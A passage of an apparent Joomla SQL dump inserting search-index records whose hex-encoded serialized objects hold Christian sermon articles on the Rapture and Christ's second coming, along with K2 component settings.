0c3877c432c20c3a77c632c20c4867c432c20c4877c632c20c4887c432c20c4897c632c20c48a7c432c20c48b7c632c20c48c7c432c20c48d7c632c20c3907c442c20c3b07c642c20c48e7c442c20c48f7c642c20c4907c442c20c4917c642c20c3887c452c20c3897c452c20c38a7c452c20c38b7c452c20c3a87c652c20c3a97c652c20c3aa7c652c20c3ab7c652c20c4927c452c20c4937c652c20c4947c452c20c4957c652c20c4967c452c20c4977c652c20c4987c452c20c4997c652c20c49a7c452c20c49b7c652c20c49c7c472c20c49d7c672c20c49e7c472c20c49f7c672c20c4a07c472c20c4a17c672c20c4a27c472c20c4a37c672c20c4a47c482c20c4a57c682c20c4a67c482c20c4a77c682c20c38c7c492c20c38d7c492c20c38e7c492c20c38f7c492c20c3ac7c692c20c3ad7c692c20c3ae7c692c20c3af7c692c20c4a87c492c20c4a97c692c20c4aa7c492c20c4ab7c692c20c4ac7c492c20c4ad7c692c20c4ae7c492c20c4af7c692c20c4b07c492c20c4b17c692c20c4b47c4a2c20c4b57c6a2c20c4b67c4b2c20c4b77c6b2c20c4b87c6b2c20c4b97c4c2c20c4ba7c6c2c20c4bb7c4c2c20c4bc7c6c2c20c4bd7c4c2c20c4be7c6c2c20c4bf7c4c2c20c5807c6c2c20c5817c4c2c20c5827c6c2c20c3917c4e2c20c3b17c6e2c20c5837c4e2c20c5847c6e2c20c5857c4e2c20c5867c6e2c20c5877c4e2c20c5887c6e2c20c5897c6e2c20c58a7c4e2c20c58b7c6e2c20c3927c4f2c20c3937c4f2c20c3947c4f2c20c3957c4f2c20c3967c4f2c20c3987c4f2c20c3b27c6f2c20c3b37c6f2c20c3b47c6f2c20c3b57c6f2c20c3b67c6f2c20c3b87c6f2c20c58c7c4f2c20c58d7c6f2c20c58e7c4f2c20c58f7c6f2c20c5907c4f2c20c5917c6f2c20c5947c522c20c5957c722c20c5967c522c20c5977c722c20c5987c522c20c5997c722c20c59a7c532c20c59b7c732c20c59c7c532c20c59d7c732c20c59e7c532c20c59f7c732c20c5a07c532c20c5a17c732c20c5bf7c732c20c5a27c542c20c5a37c742c20c5a47c542c20c5a57c742c20c5a67c542c20c5a77c742c20c3997c552c20c39a7c552c20c39b7c552c20c39c7c552c20c3b97c752c20c3ba7c752c20c3bb7c752c20c3bc7c752c20c5a87c552c20c5a97c752c20c5aa7c552c20c5ab7c752c20c5ac7c552c20c5ad7c752c20c5ae7c552c20c5af7c752c20c5b07c552c20c5b17c752c20c5b27c552c20c5b37c752c20c5b47c572c20c5b57c772c20c39d7c592c20c3bd7c792c20c3bf7c792c20c5b67c592c20c5b77c792c20c5b87c592c20c5b97c5a2c20c5ba7c7a2c20c5bb7c5a2c20c5bc7c7a2c20c5bd7c5a2c20c5be7c7a2c20ceb17c612c20ceb27c622c20ceb37c672c20ceb47c642c20ceb57c652c20ceb67c7a2c20ceb77c682c20ceb87c74682c20ceb97c692c20ceba7c6b2c20cebb7c6c2c20cebc7c6d2c20cebd7c6e2c20cebe7c782c20cebf7c6f2c20cf807c702c20cf817c722c20cf837c732c20cf847c742c20cf857c792c20cf867c662c20cf877c63682c20cf887c70732c20cf897c772c20ce917c412c20ce927c422c20ce937c472c20ce947c442c20ce957c452c20ce967c5a2c20ce977c482c20ce987c54682c20ce997c492c20ce9a7c4b2c20ce9b7c4c2c20ce9c7c4d2c20ce9e7c582c20ce9f7c4f2c20cea07c502c20cea17c522c20cea37c532c20cea47c542c20cea57c592c20cea67c462c20cea77c43682c20cea87c50732c20cea97c572c20ceac7c612c20cead7c652c20ceae7c682c20ceaf7c692c20cf8c7c6f2c20cf8d7c792c20cf8e7c772c20ce867c412c20ce887c452c20ce897c482c20ce8a7c492c20ce8c7c4f2c20ce8e7c592c20ce8f7c572c20cf8a7c692c20ce907c692c20cf8b7c792c20cf827c732c20d0907c412c20d3907c412c20d3927c412c20d3987c452c20d39a7c452c20d3947c452c20d0917c422c20d0927c562c20d0937c472c20d2907c472c20d0837c472c20d2927c472c20d3b67c472c20797c592c20d0947c442c20d0957c452c20d0807c452c20d0817c594f2c20d3967c452c20d2bc7c452c20d2be7c452c20d0847c59452c20d0967c5a482c20d3817c445a482c20d2967c5a482c20d39c7c445a482c20d0977c5a2c20d2987c5a2c20d39e7c445a2c20d3a07c445a2c20d0857c445a2c20d0987c492c20d08d7c492c20d3a47c492c20d3a27c492c20d0867c492c20d0877c4a492c20d3807c492c20d0997c592c20d28a7c592c20d0887c4a2c20d09a7c4b2c20d29a7c512c20d29e7c512c20d2a07c4b2c20d3837c512c20d29c7c4b2c20d09b7c4c2c20d3857c4c2c20d0897c4c2c20d09c7c4d2c20d38d7c4d2c20d09d7c4e2c20d3897c4e2c20d2a27c4e2c20d3877c4e2c20d2a47c4e2c20d08a7c4e2c20d09e7c4f2c20d3a67c4f2c20d3a87c4f2c20d3aa7c4f2c20d2a87c4f2c20d09f7c502c20d2a67c50462c20d0a07c502c20d28e7c502c20d0a17c532c20d2aa7c532c20d0a27c542c20d2ac7c54482c20d08b7c542c20d08c7c4b2c20d0a37c552c20d08e7c552c20d3b27c552c20d3b07c552c20d3ae7c552c20d2ae7c552c20d2b07c552c20d0a47c462c20d0a57c482c20d2b27c482c20d2ba7c482c20d0a67c54532c20d2b47c54532c20d0a77c43482c20d3b47c43482c20d2b67c43482c20d38b7c43482c20d2b87c43482c20d08f7c445a2c20d0a87c53482c20d0a97c5348542c20d0aa7c412c20d0ab7c592c20d3b87c592c20d0ac7c592c20d28c7c592c20d0ad7c452c20d3ac7c452c20d0ae7c59552c20d0af7c59412c20d0b07c612c20d3917c612c20d3937c612c20d3997c652c20d39b7c652c20d3957c652c20d0b17c622c20d0b27c762c20d0b37c672c20d2917c672c20d1937c672c20d2937c672c20d3b77c672c20797c792c20d0b47c642c20d0b57c652c20d1907c652c20d1917c796f2c20d3977c652c20d2bd7c652c20d2bf7c652c20d1947c79652c20d0b67c7a682c20d3827c647a682c20d2977c7a682c20d39d7c647a682c20d0b77c7a2c20d2997c7a2c20d39f7c647a2c20d3a17c647a2c20d1957c647a2c20d0b87c692c20d19d7c692c20d3a57c692c20d3a37c692c20d1967c692c20d1977c6a692c20d3807c692c20d0b97c792c20d28b7c792c20d1987c6a2c20d0ba7c6b2c20d29b7c712c20d29f7c712c20d2a17c6b2c20d3847c712c20d29d7c6b2c20d0bb7c6c2c20d3867c6c2c20d1997c6c2c20d0bc7c6d2c20d38e7c6d2c20d0bd7c6e2c20d38a7c6e2c20d2a37c6e2c20d3887c6e2c20d2a57c6e2c20d19a7c6e2c20d0be7c6f2c20d3a77c6f2c20d3a97c6f2c20d3ab7c6f2c20d2a97c6f2c20d0bf7c702c20d2a77c70662c20d1807c702c20d28f7c702c20d1817c732c20d2ab7c732c20d1827c742c20d2ad7c74682c20d19b7c742c20d19c7c6b2c20d1837c752c20d19e7c752c20d3b37c752c20d3b17c752c20d3af7c752c20d2af7c752c20d2b17c752c20d1847c662c20d1857c682c20d2b37c682c20d2bb7c682c20d1867c74732c20d2b57c74732c20d1877c63682c20d3b57c63682c20d2b77c63682c20d38c7c63682c20d2b97c63682c20d19f7c647a2c20d1887c73682c20d1897c7368742c20d18a7c612c20d18b7c792c20d3b97c792c20d18c7c792c20d28d7c792c20d18d7c652c20d3ad7c652c20d18e7c79752c20d18f7c7961223b733a353a226b32536566223b733a313a2230223b733a31333a226b325365664c6162656c436174223b733a373a22636f6e74656e74223b733a31333a226b325365664c6162656c546167223b733a333a22746167223b733a31343a226b325365664c6162656c55736572223b733a363a22617574686f72223b733a31363a226b325365664c6162656c536561726368223b733a363a22736561726368223b733a31343a226b325365664c6162656c44617465223b733a343a2264617465223b733a31343a226b325365664c6162656c4974656d223b733a313a2230223b733a32363a226b325365664c6162656c4974656d437573746f6d507265666978223b733a303a22223b733a31373a226b32536566496e736572744974656d4964223b733a313a2231223b733a32343a226b325365664974656d49645469746c65416c696173536570223b733a343a2264617368223b733a32323a226b325365665573654974656d5469746c65416c696173223b733a313a2231223b733a31363a226b32536566496e736572744361744964223b733a313a2231223b733a32333a226b3253656643617449645469746c65416c696173536570223b733a343a2264617368223b733a32313a226b325365665573654361745469746c65416c696173223b733a313a2231223b7d733a31343a22002a00696e697469616c697a6564223b623a313b733a393a22736570617261746f72223b733a313a222e223b7d733a373a226d6574616b6579223b733a303a22223b733a383a226d65746164657363223b733a303a22223b733a383a226d65746164617461223b4f3a32343a224a6f6f6d6c615c52656769737472795c5265676973747279223a333a7b733a373a22002a0064617461223b4f3a383a22737464436c617373223a323a7b733a363a22726f626f7473223b733a303a22223b733a363a22617574686f72223b733a303a22223b7d733a31343a22002a00696e697469616c697a6564223b623a313b733a393a22736570617261746f72223b733a313a222e223b7d733a383a226f72646572696e67223b733a313a2235223b733a353a227472617368223b733a313a2230223b733a393a226361745f7472617368223b733a313a2230223b733a383a2263617465676f7279223b733a353a224661697468223b733a393a226361745f7374617465223b733a313a2231223b733a31303a226361745f616363657373223b733a313a2231223b733a31393a2265787472615f6669656c64735f736561726368223b733a303a22223b733a31323a2265787472615f6669656c6473223b733a323a225b5d223b733a343a22736c7567223b733a33373a2231343a7468652d686f70652d6f662d6368726973742d732d7365636f6e642d636f6d696e67223b733a373a22636174736c7567223b733a373a22323a6661697468223b733a363a22617574686f72223b733a393a224c6966656f61736973223b733a363a226c61796f7574223b733a343a226974656d223b733a343a2270617468223b733a35353a22636f6d706f6e656e742f6b322f6974656d2f31342d7468652d686f70652d6f662d6368726973742d732d7365636f6e642d636f6d696e67223b733a31303a226d657461617574686f72223b4e3b7d733a31353a22002a00696e737472756374696f6e73223b613a353a7b693a313b613a333a7b693a303b733a353a227469746c65223b693a313b733a383a227375627469746c65223b693a323b733a323a226964223b7d693a323b613a323a7b693a303b733a373a2273756d6d617279223b693a313b733a343a22626f6479223b7d693a333b613a393a7b693a303b733a343a226d657461223b693a313b733a31303a226c6973745f7072696365223b693a323b733a31303a2273616c655f7072696365223b693a333b733a373a226d6574616b6579223b693a343b733a383a226d65746164657363223b693a353b733a31303a226d657461617574686f72223b693a363b733a363a22617574686f72223b693a373b733a31363a22637265617465645f62795f616c696173223b693a383b733a31393a2265787472615f6669656c64735f736561726368223b7d693a343b613a323a7b693a303b733a343a2270617468223b693a313b733a353a22616c696173223b7d693a353b613a313a7b693a303b733a383a22636f6d6d656e7473223b7d7d733a31313a22002a007461786f6e6f6d79223b613a353a7b733a343a2254797065223b613a313a7b733a373a224b32204974656d223b4f3a373a224a4f626a656374223a343a7b733a31303a22002a005f6572726f7273223b613a303a7b7d733a353a227469746c65223b733a373a224b32204974656d223b733a353a227374617465223b693a313b733a363a22616363657373223b693a313b7d7d733a363a22417574686f72223b613a313a7b733a393a224c6966656f61736973223b4f3a373a224a4f626a656374223a343a7b733a31303a22002a005f6572726f7273223b613a303a7b7d733a353a227469746c65223b733a393a224c6966656f61736973223b733a353a227374617465223b693a313b733a363a22616363657373223b693a313b7d7d733a31313a224b322043617465676f7279223b613a313a7b733a353a224661697468223b4f3a373a224a4f626a656374223a343a7b733a31303a22002a005f6572726f7273223b613a303a7b7d733a353a227469746c65223b733a353a224661697468223b733a353a227374617465223b693a313b733a363a22616363657373223b693a313b7d7d733a383a224c616e6775616765223b613a313a7b733a313a222a223b4f3a373a224a4f626a656374223a343a7b733a31303a22002a005f6572726f7273223b613a303a7b7d733a353a227469746c65223b733a313a222a223b733a353a227374617465223b693a313b733a363a22616363657373223b693a313b7d7d733a31323a224578747261206669656c6473223b613a313a7b733a323a225b5d223b4f3a373a224a4f626a656374223a343a7b733a31303a22002a005f6572726f7273223b613a303a7b7d733a353a227469746c65223b733a323a225b5d223b733a353a227374617465223b693a313b733a363a22616363657373223b693a313b7d7d7d733a333a2275726c223b733a33393a22696e6465782e7068703f6f7074696f6e3d636f6d5f6b3226766965773d6974656d2669643d3134223b733a353a22726f757465223b733a37343a22696e6465782e7068703f6f7074696f6e3d636f6d5f6b3226766965773d6974656d2669643d31343a7468652d686f70652d6f662d6368726973742d732d7365636f6e642d636f6d696e67223b733a353a227469746c65223b733a33343a2254686520486f7065206f66204368726973742773205365636f6e6420436f6d696e67223b733a31313a226465736372697074696f6e223b733a3336363a2220544558543a2052657620313a372d392c204163747320313a392d31313a20e2809c416e6420746f207761697420666f722068697320536f6e2066726f6d2068656176656e2c2077686f6d206865207261697365642066726f6d2074686520646561642c206576656e204a657375732c2077686963682064656c6976657265642075732066726f6d2074686520777261746820746f20636f6d652ee2809d31205468657373616c6f6e69616e7320313a313020496e206f757220746578742061626f76652c205061756c207761732072652d656e616374696e6720746865697220686f70657320696e20746865207365636f6e6420636f6d696e67206f6620746865204c6f72642e2048652061646d6f6e6973686564207468652043687572636820746f207761697420666f722048696d2e20497420697320696e746572657374696e6720746f206b6e6f772074686174204a65737573206973207374696c6c20636f6d696e67206261636b2e20223b733a393a227075626c6973686564223b4e3b733a353a227374617465223b693a313b733a363a22616363657373223b733a313a2231223b733a383a226c616e6775616765223b733a313a222a223b733a31383a227075626c6973685f73746172745f64617465223b733a31393a22323031372d30312d30372032323a30333a3031223b733a31363a227075626c6973685f656e645f64617465223b733a31393a22303030302d30302d30302030303a30303a3030223b733a31303a2273746172745f64617465223b733a31393a22323031372d30312d30372032323a30333a3031223b733a383a22656e645f64617465223b733a31393a22303030302d30302d30302030303a30303a3030223b733a31303a226c6973745f7072696365223b4e3b733a31303a2273616c655f7072696365223b4e3b733a373a22747970655f6964223b693a323b733a31353a2264656661756c744c616e6775616765223b733a353a22656e2d4742223b7d);
INSERT INTO `y57u5_finder_links` (`link_id`, `url`, `route`, `title`, `description`, `indexdate`, `md5sum`, `published`, `state`, `access`, `language`, `publish_start_date`, `publish_end_date`, `start_date`, `end_date`, `list_price`, `sale_price`, `type_id`, `object`) VALUES
(236, 'index.php?option=com_k2&view=item&id=15', 'index.php?option=com_k2&view=item&id=15:rapture', 'Are you prepared for Rapture?', ' Text: 1Thes4:14-18; 1 John3:2, Matt.24:3, 27-51, 25:31-46; Jude 14; Rev.9:11-21; Zech 14:1-5 Rapture is a military term meaning “a quick take away\". Hence, the Bible says in 1 Thessalonians 4:17. \"Then we which are alive and remain shall be caught up together with them in the clouds, to meet the Lord in the air: and so shall we ever be with the Lord\". The very next event on God\'s end time calendar is the rapture of the church. This refers to the catching up of all the believers in Christ for a glorious meeting with Christ in the air. And one notable thing about it is that it is imminent and could take place any moment. ', '2017-06-25 14:18:19', '510afea81bc457ebb0f006afe329fe28', 1, 1, 1, '*', '2017-01-15 06:35:42', '0000-00-00 00:00:00', '2017-01-15 06:35:42', '0000-00-00 00:00:00', 0, 0, 2, 0x4f3a31393a2246696e646572496e6465786572526573756c74223a31393a7b733a31313a22002a00656c656d656e7473223b613a32373a7b733a323a226964223b733a323a223135223b733a353a22616c696173223b733a373a2272617074757265223b733a373a2273756d6d617279223b733a3732393a223c7020636c6173733d224d736f4e6f726d616c223e546578743a203154686573343a31342d31383b2031204a6f686e333a322c204d6174742e32343a332c2032372d35312c2032353a33312d34363b204a7564652031343b205265762e393a31312d32313b205a6563682031343a312d35c2a03c2f703e0d0a3c7020636c6173733d224d736f4e6f726d616c223e52617074757265c2a0c2a02069732061206d696c6974617279207465726d206d65616e696e6720e2809c6120717569636b2074616b652061776179222e2048656e63652c20746865204269626c65207361797320696e2031205468657373616c6f6e69616e7320343a31372e20225468656e2077652077686963682061726520616c69766520616e642072656d61696e207368616c6c2062652063617567687420757020746f6765746865722077697468207468656d20696e2074686520636c6f7564732c20746f206d65657420746865204c6f726420696e20746865206169723a20616e6420736f207368616c6c2077652065766572206265207769746820746865204c6f7264222e3c2f703e0d0a3c7020636c6173733d224d736f4e6f726d616c223e5468652076657279206e657874206576656e74206f6e20476f64277320656e642074696d652063616c656e646172c2a0c2a0206973207468652072617074757265206f6620746865206368757263682ec2a0c2a020546869732072656665727320746f20746865206361746368696e67207570206f6620616c6c207468652062656c696576657273c2a0c2a020696e2043687269737420666f72206120676c6f72696f7573206d656574696e6720776974682043687269737420696e20746865206169722e20416e64c2a0c2a0206f6e65206e6f7461626c65207468696e672061626f7574206974206973207468617420697420697320696d6d696e656e7420616e6420636f756c642074616b6520706c61636520616e79206d6f6d656e742e3c2f703e0d0a223b733a343a22626f6479223b733a333337303a220d0a3c7020636c6173733d224d736f4e6f726d616c223e546865206465616420696e204368726973742077696c6c20617269736520666972737420616e64207468656e20776520746861742061726520616c6976652028312054686573732e20323a392c20343a31332d31372c20353a32332c203120436f722e2031353a31352d35382c20322054686573732e20323a312c20372d38293c2f703e0d0a3c7020636c6173733d224d736f4e6f726d616c223e412074797065206f6620436872697374c2a0c2a02072617074757265206f66207361696e7473206973c2a020666f756e6420696e20746865204f6c64c2a02054657374616d656e742073746f7279c2a0206f6620456c696a616820616e64c2a020456c6973686120696e2032204b696e6773c2a0c2a020323a3131c2a02022616e642073756464656e6c79c2a0207468657265206170706561726564c2a020612063686172696f74206f662066697265202e2e2e202220486f77657665722cc2a02072617074757265c2a0207374696c6cc2a02064696666657273c2a0c2a02066726f6d20746865205365636f6e64c2a020436f6d696e67206f66204a65737573c2a020436872697374c2a0207768696368c2a0206973207468652076697369626c652cc2a0c2a020696e20776869636820657665727920657965207368616c6c207365652048696d207769746820686973c2a0207361696e747320746f2070757420656e6420746f20746865206d697372756c65206f6620536174616ec2a020616e64c2a020686973206167656e74733bc2a02068656e63652cc2a02065737461626c697368696e67c2a0c2a020746865c2a0206b696e67646f6dc2a0206f662068656176656e206f6e2065617274682ec2a0204d61742032343a33302d33313c2f703e0d0a3c7020636c6173733d224d736f4e6f726d616c223e466163746f727320746861742063616e2068696e64657220612043687269737469616e2066726f6d20676f696e672077697468204368726973742061742074686520726170747572653a3c2f703e0d0a3c6f6c3e0d0a3c6c6920636c6173733d224d736f4e6f726d616c223e3c7374726f6e673e4c656176696e6720796f7572206669727374206c6f76652e3c2f7374726f6e673e20c2a05265762e20323a342d353b205265762e333a31352d31362c204d61726b20383a33382e205768656e20796f75206261636b736c69646520616e6420626567696e20746f20746f6c657261746520c2a0206576696c207468696e677320796f752068617665206f6e65206465746573742e3c2f6c693e0d0a3c6c6920636c6173733d224d736f4e6f726d616c223e3c7374726f6e673e486f6c64696e6720756e746f20737472616e676520616e642064656d6f6e696320646f637472696e65732e3c2f7374726f6e673ec2a020c2a054686573652061726520646f637472696e657320c2a02074686174206469726563746c7920636f6e666c696374207769746820746865207772697474656e20776f7264206f6620476f642c20646f637472696e65732074686174207065726d697473207768617420476f6420666f72626964732d20c2a0205265762e20c2a0323a31342d31352c204570682e343a31312d31342c20312054696d2e343a312e3c2f6c693e0d0a3c6c6920636c6173733d224d736f4e6f726d616c223e3c7374726f6e673e476976696e6720c2a0206865656420746f207769746368637261667420616e64207365647563696e672073706972697473202874686520737069726974206f66204a657a6562656c2920616e6420616c736f206265696e67206120736564756365723c2f7374726f6e673e2e205265762e20c2a0323a32302d32332c20312054696d2e20c2a0343a312e3c2f6c693e0d0a3c6c6920636c6173733d224d736f4e6f726d616c223e3c7374726f6e673e4879706f63726973793a3c2f7374726f6e673e20c2a020486176696e67206120666f726d206f6620676f646c696e657373206275742064656e79696e672074686520706f7765722074686572656f662e20c2a04265696e672073616e6374696d6f6e696f757320776974686f75742073616e6374696669636174696f6e2c2072656c6967696f757320c2a020c2a079657420726562656c6c696f75732e205468657365206861766520616e20617070656172616e636520c2a0206f6620676f646c696e657373206275742074686579206172652066756c6c206f662073696e20616e6420646566696c656d656e742e20c2a020c2a054686579206172652073706972697475616c6c7920646561642d20c2a05265762e333a312d342c203254696d20333a352c203154696d343a322e3c2f6c693e0d0a3c6c6920636c6173733d224d736f4e6f726d616c223e3c7374726f6e673e5468652064656365697466756c6e657373206f66207269636865732c2070757273756974206f66207765616c74682061742074686520657870656e7365206f66207269676874207374616e64696e6720c2a0207769746820476f643a3c2f7374726f6e673e205265762e20c2a0333a31372d31382c204d6174746865772c2031333a32322e20322054696d6f74687920333a312d343c2f6c693e0d0a3c6c6920636c6173733d224d736f4e6f726d616c223e3c7374726f6e673e436f7665746f75736e6573733a3c2f7374726f6e673e20496e6f7264696e617465206465736972652c206578636573736976656c7920656167657220746f206f627461696e20616e6420706f73736573732067726565642e203120436f7220363a313020736179732074686579207368616c6c206e6f7420696e686572697420746865206b696e67646f6d20c2a0206f6620476f642e20224920736565202e2e2e2e6c2074616b6522206e6f7420c2a06d696e64696e6720c2a077686f206f776e73206974206f7220686f77204920c2a0676f74206974213c2f6c693e0d0a3c6c6920636c6173733d224d736f4e6f726d616c223e3c7374726f6e673e426c61737068656d793a3c2f7374726f6e673e204d65616e7320697272656c6576616e636520746f776172647320736f6d657468696e6720636f6e7369646572656420736163726564206f7220696e76696f6c61626c652e20c2a02049742069732074686520616374206f6620696e73756c74696e67206f722073686f77696e6720c2a020636f6e74656d707420666f7220746865207468696e6773206f6620476f642e20c2a049742069732070726f66616e6974792d20c2a0204d6174742e31323a31332e20c2a020c2a05265762e20c2a0323a392e3c2f6c693e0d0a3c6c6920636c6173733d224d736f4e6f726d616c223e3c7374726f6e673e4469736f62656469656e636520c2a020746f20706172656e74733a3c2f7374726f6e673ec2a0476f642065787065637473206368696c6472656e20746f20686f6e6f757220616e64206f62657920746865697220706172656e747320696e206163636f7264616e636520746f207468652077696c6c206f6620476f64206368696c6472656e2c206f62657920796f757220706172656e747320494e20544845204c4f5244202845706820363a31292e3c2f6c693e0d0a3c6c6920636c6173733d224d736f4e6f726d616c223e3c7374726f6e673e44657370697365727320c2a06f662074686f736520746861742061726520676f6f643a3c2f7374726f6e673e2043796e6963616c2c20686174657273206f6620676f6f642c206661756c742066696e646572732e2057652068617665206120676f6f64206578616d706c6520c2a020696e207468652050686172697365657320616e64205361646475636565732e20c2a0446573706974652074686520676f6f6420776f726b732074686174204a657375732063616d6520746f20646f206f6e207468652065617274682c20746865792064657370697365642068696d20616e642068617465642068696d2e3c2f6c693e0d0a3c6c6920636c6173733d224d736f4e6f726d616c223e3c7374726f6e673e576f726b73206f6620466c6573683a3c2f7374726f6e673e2047616c617469616e7320c2a020353a31392d3231c2a03c2f6c693e0d0a3c6c6920636c6173733d224d736f4e6f726d616c223e3c7374726f6e673e416e642073756368206c696b653a3c2f7374726f6e673ec2a04576657279206f7468657220756e6c697374656420776f726b206f662074686520666c65736820746861742076696f6c6174657320c2a0207468652073637269707475726520c2a020616e6420636f6e64656d6e7320796f757220636f6e736369656e63652e205573696e67207468652061626f766520666163746f7273206173206120636865636b206c6973742c206973207468657265207374696c6c20616e79206f662074686573652072656d61696e696e6720696e20796f7572206c6966653f2054616b652061206465636973696f6e20746f64617920746f206d616b652074686520726170747572652e3c2f6c693e0d0a3c2f6f6c3e0d0a3c703e3c7374726f6e673e476f6420626c65737320796f752e3c2f7374726f6e673e3c2f703e0d0a3c703ec2a03c2f703e0d0a3c7020636c6173733d224d736f4e6f726d616c223ec2a03c2f703e223b733a353a226361746964223b733a313a2232223b733a31303a22637265617465645f6279223b733a333a22313936223b733a31363a22637265617465645f62795f616c696173223b733a303a22223b733a383a226d6f646966696564223b733a31393a22323031372d30312d32322030383a35363a3336223b733a31313a226d6f6469666965645f6279223b733a333a22313936223b733a363a22706172616d73223b4f3a32343a224a6f6f6d6c615c52656769737472795c5265676973747279223a333a7b733a373a22002a0064617461223b4f3a383a22737464436c617373223a3135323a7b733a31303a22656e61626c655f637373223b733a313a2230223b733a31343a226a517565727948616e646c696e67223b733a313a2230223b733a32313a226261636b656e644a517565727948616e646c696e67223b733a353a226c6f63616c223b733a383a22757365724e616d65223b733a313a2230223b733a393a2275736572496d616765223b733a313a2230223b733a31353a22757365724465736372697074696f6e223b733a313a2230223b733a373a227573657255524c223b733a313a2231223b733a393a2275736572456d61696c223b733a313a2230223b733a31323a2275736572466565644c696e6b223b733a313a2230223b733a31323a22757365724665656449636f6e223b733a313a2231223b733a31333a22757365724974656d436f756e74223b733a323a223130223b733a31333a22757365724974656d5469746c65223b733a313a2231223b733a31393a22757365724974656d5469746c654c696e6b6564223b733a313a2231223b733a31393a22757365724974656d4461746543726561746564223b733a313a2231223b733a31333a22757365724974656d496d616765223b733a313a2231223b733a31373a22757365724974656d496e74726f54657874223b733a313a2231223b733a31363a22757365724974656d43617465676f7279223b733a313a2230223b733a31323a22757365724974656d54616773223b733a313a2231223b733a32323a22757365724974656d436f6d6d656e7473416e63686f72223b733a313a2231223b733a31363a22757365724974656d526561644d6f7265223b733a313a2231223b733a31373a22757365724974656d4b32506c7567696e73223b733a313a2231223b733a31323a227461674974656d436f756e74223b733a323a223130223b733a31323a227461674974656d5469746c65223b733a313a2231223b733a31383a227461674974656d5469746c654c696e6b6564223b733a313a2231223b733a31383a227461674974656d4461746543726561746564223b733a313a2231223b733a31323a227461674974656d496d616765223b733a313a2231223b733a31363a227461674974656d496e74726f54657874223b733a313a2231223b733a31353a227461674974656d43617465676f7279223b733a313a2231223b733a31353a227461674974656d526561644d6f7265223b733a313a2231223b733a31383a227461674974656d45787472614669656c6473223b733a313a2230223b733a31313a227461674f72646572696e67223b733a353a22616c706861223b733a31313a22746167466565644c696e6b223b733a313a2231223b733a31313a227461674665656449636f6e223b733a313a2231223b733a31363a2267656e657269634974656d436f756e74223b733a323a223130223b733a31363a2267656e657269634974656d5469746c65223b733a313a2231223b733a32323a2267656e657269634974656d5469746c654c696e6b6564223b733a313a2231223b733a32323a2267656e657269634974656d4461746543726561746564223b733a313a2231223b733a31363a2267656e657269634974656d496d616765223b733a313a2231223b733a32303a2267656e657269634974656d496e74726f54657874223b733a313a2231223b733a31393a2267656e657269634974656d43617465676f7279223b733a313a2231223b733a31393a2267656e657269634974656d526561644d6f7265223b733a313a2231223b733a32323a2267656e657269634974656d45787472614669656c6473223b733a313a2230223b733a31353a2267656e65726963466565644c696e6b223b733a313a2231223b733a31353a2267656e657269634665656449636f6e223b733a313a2231223b733a393a22666565644c696d6974223b733a323a223130223b733a31333a22666565644974656d496d616765223b733a313a2230223b733a31313a2266656564496d6753697a65223b733a313a2253223b733a31373a22666565644974656d496e74726f54657874223b733a313a2231223b733a31373a226665656454657874576f72644c696d6974223b733a303a22223b733a31363a22666565644974656d46756c6c54657874223b733a313a2231223b733a31323a22666565644974656d54616773223b733a313a2230223b733a31333a22666565644974656d566964656f223b733a313a2230223b733a31353a22666565644974656d47616c6c657279223b733a313a2230223b733a31393a22666565644974656d4174746163686d656e7473223b733a313a2230223b733a31343a2266656564426f677573456d61696c223b733a303a22223b733a31363a22696e74726f54657874436c65616e7570223b733a313a2230223b733a32373a22696e74726f54657874436c65616e75704578636c75646554616773223b733a303a22223b733a32333a22696e74726f54657874436c65616e757054616741747472223b733a303a22223b733a31353a2266756c6c54657874436c65616e7570223b733a313a2230223b733a32363a2266756c6c54657874436c65616e75704578636c75646554616773223b733a303a22223b733a32323a2266756c6c54657874436c65616e757054616741747472223b733a303a22223b733a31323a2278737346696c746572696e67223b733a313a2230223b733a31343a226c696e6b506f7075705769647468223b733a333a22393030223b733a31353a226c696e6b506f707570486569676874223b733a333a22363030223b733a31333a22696d616765735175616c697479223b733a333a22313030223b733a31313a226974656d496d6167655853223b733a323a223634223b733a31303a226974656d496d61676553223b733a333a22323030223b733a31303a226974656d496d6167654d223b733a333a22383536223b733a31303a226974656d496d6167654c223b733a333a22383536223b733a31313a226974656d496d616765584c223b733a333a22383536223b733a31363a226974656d496d61676547656e65726963223b733a333a22383536223b733a31333a22636174496d6167655769647468223b733a333a22313030223b733a31353a22636174496d61676544656661756c74223b733a313a2230223b733a31343a2275736572496d6167655769647468223b733a323a223634223b733a31363a2275736572496d61676544656661756c74223b733a313a2231223b733a31373a22636f6d6d656e746572496d675769647468223b733a323a223438223b733a31373a226f6e6c696e65496d616765456469746f72223b733a393a2273756d6f7061696e74223b733a31343a22696d61676554696d657374616d70223b733a313a2230223b733a31363a22696d6167654d656d6f72794c696d6974223b733a303a22223b733a31363a22736f6369616c427574746f6e436f6465223b733a303a22223b733a31353a2274776974746572557365726e616d65223b733a303a22223b733a31363a2266616365626f6f6b4d65746174616773223b733a313a2231223b733a31333a2266616365626f6f6b496d616765223b733a363a2258536d616c6c223b733a383a22636f6d6d656e7473223b733a313a2232223b733a31363a22636f6d6d656e74734f72646572696e67223b733a343a2244455343223b733a31333a22636f6d6d656e74734c696d6974223b733a323a223130223b733a32303a22636f6d6d656e7473466f726d506f736974696f6e223b733a353a2262656c6f77223b733a31383a22636f6d6d656e74735075626c697368696e67223b733a313a2231223b733a31373a22636f6d6d656e74735265706f7274696e67223b733a313a2232223b733a32333a22636f6d6d656e74735265706f7274526563697069656e74223b733a303a22223b733a32343a22696e6c696e65436f6d6d656e74734d6f6465726174696f6e223b733a313a2230223b733a383a226772617661746172223b733a313a2231223b733a383a22616e74697370616d223b733a393a22726563617074636861223b733a32323a22726563617074636861466f7252656769737465726564223b733a313a2231223b733a32303a22616b69736d6574466f7252656769737465726564223b733a313a2230223b733a31373a22636f6d6d656e7473466f726d4e6f746573223b733a313a2231223b733a32313a22636f6d6d656e7473466f726d4e6f74657354657874223b733a303a22223b733a31353a2266726f6e74656e6445646974696e67223b733a313a2231223b733a31323a2273686f77496d616765546162223b733a313a2231223b733a31393a2273686f77496d61676547616c6c657279546162223b733a313a2231223b733a31323a2273686f77566964656f546162223b733a313a2231223b733a31383a2273686f7745787472614669656c6473546162223b733a313a2231223b733a31383a2273686f774174746163686d656e7473546162223b733a313a2231223b733a31333a2273686f774b32506c7567696e73223b733a313a2231223b733a32323a2273696465426172446973706c617946726f6e74656e64223b733a313a2230223b733a31323a226d65726765456469746f7273223b733a313a2231223b733a31343a2273696465426172446973706c6179223b733a313a2231223b733a31373a226174746163686d656e7473466f6c646572223b733a303a22223b733a31363a2268696465496d706f7274427574